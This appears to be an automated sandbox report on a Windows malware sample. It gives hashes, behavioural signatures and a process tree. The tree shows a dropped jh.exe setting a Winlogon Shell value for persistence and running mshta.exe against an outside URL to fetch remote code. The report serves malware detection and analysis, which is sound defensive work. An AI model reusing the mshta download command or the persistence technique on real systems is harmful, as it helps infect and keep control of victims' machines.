Analysis
- max time kernel: 150s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27/06/2024, 21:15
Behavioral task: behavioral1
- Sample: 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
- Resource: win7-20240611-en
Behavioral task: behavioral2
- Sample: 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
- Resource: win10v2004-20240611-en
General
- Target: 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
- Size: 767KB
- MD5: 178e23ce61f1c87fb69a2d23ce241c03
- SHA1: b87efed82f2472022388981cfdd295c330076adb
- SHA256: c84b93ea9418e569a419b29a12a34687767b9a5f970fee6b44bee1a535c10f12
- SHA512: faaea84772419c24c49a1d1f072e19ccecbf6b498de4227b1b649e9fc3109fd46c6bb26ac0aae0c1ab8b883a1664efe8d2c69b09a840af226647f6056bbc4186
- SSDEEP: 12288:TsC/xLjZPUyBiLCCKG3NTJUVtn5OmujtCXh/eBd7cmnRhQpYaKIPPzeNjtH0Q2Pq:Yuj2y+CC99NKtnekRmBhRh9aKIPLotUQ
Malware Config
- Extracted: http://repoiury.com/inst.php?id=lee_02&lang=ENU
Signatures
- Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe"
  Process: jh.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation
  Process: 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation
  Process: jh.exe
- Executes dropped EXE (2 IoCs)
  pid 2312, Process jh.exe
  pid 2980, Process jh1.exe
- (resource / yara_rule)
  behavioral2/memory/1840-1-0x0000000000400000-0x00000000004F1000-memory.dmp: upx
  behavioral2/files/0x0003000000022965-12.dat: upx
  behavioral2/memory/2312-16-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/1840-33-0x0000000000400000-0x00000000004F1000-memory.dmp: upx
  behavioral2/memory/2312-41-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-42-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-43-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-45-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-46-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-47-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-48-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-49-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-50-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-51-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-52-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-53-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-54-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-55-0x0000000000400000-0x0000000000802000-memory.dmp: upx
  behavioral2/memory/2312-56-0x0000000000400000-0x0000000000802000-memory.dmp: upx
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoC)
  pid 3184, pid_target 2980, Process WerFault.exe, procid_target 96
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 2312, Process jh.exe (64 identical entries)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 2312, Process jh.exe (2 identical entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  PID 1840 wrote to memory of 2312; pid 1840; Process 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe; procid_target 95 (3 identical entries)
  PID 1840 wrote to memory of 2980; pid 1840; Process 178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe; procid_target 96 (3 identical entries)
  PID 2312 wrote to memory of 4792; pid 2312; Process jh.exe; procid_target 98 (3 identical entries)
  PID 2312 wrote to memory of 1728; pid 2312; Process jh.exe; procid_target 99 (3 identical entries)
Processes (indentation shows parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe"
  PID: 1840
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\jh.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\jh.exe" lee_02
    PID: 2312
    Signatures: Modifies WinLogon for persistence; Checks computer location settings; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\mshta.exe
      Command line: "C:\Windows\System32\mshta.exe" http://repoiury.com/inst.php?id=lee_02&lang=ENU
      PID: 4792
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\asdfasfas.bat" "
      PID: 1728
  - C:\Users\Admin\AppData\Local\Temp\jh1.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\jh1.exe"
    PID: 2980
    Signatures: Executes dropped EXE
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 480
      PID: 3184
      Signatures: Program crash
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2980 -ip 2980
  PID: 2348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=3688 /prefetch:8
  PID: 1856
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 467KB
  MD5: c0c286f3d4b4eb46504ae767e371187f
  SHA1: 715e75e7a596d5a88eac7bb47a9b2fdd88653aea
  SHA256: 3264c96f8f77cdf612671e1899898e59bcff46d975f6fa77cc6802183dc7c065
  SHA512: f999fc28d65edbb074ba1a611543ba9a01f55677b94af037d92ebd0cde42c5077c83b907eb22b4b80dae90c56cf63448548c46ed39732377e66c01327ac0359d
- Filesize: 149KB
  MD5: 6ba6b1580ea3f493ad3d9d915b001909
  SHA1: e3abca7ed8450fdf82013958f3db5f2ab541c2b2
  SHA256: 1fed7b0afe8fc340102514011d6f6605dbe281c190740e2360ab73a1617e2800
  SHA512: 613e739975dfff40f8cd73a163129b7447c09575b44b63ccf9217367726fd13c5626ad7346554b57b0221f5665a2bd326bc9bef9a4475c2b5eeb636bcf101e4c
- Filesize: 122B
  MD5: fddfbd9d59143c6855c0e386b4af0446
  SHA1: a60145bf547b703ec4cf078fd955fc690272eb00
  SHA256: 214aca25c648fad0c7f0b799343f07fb24ba4c7df95a0bd0cac13db70e1ea2d0
  SHA512: a8f6dd937fb6c126994186e2e66a0c5dd8ef796ded55153f5f32bffe93f2743f55db9bb96288ab46201db1339e9b9b3c09d5c41da57ad3b668132cca7aac1003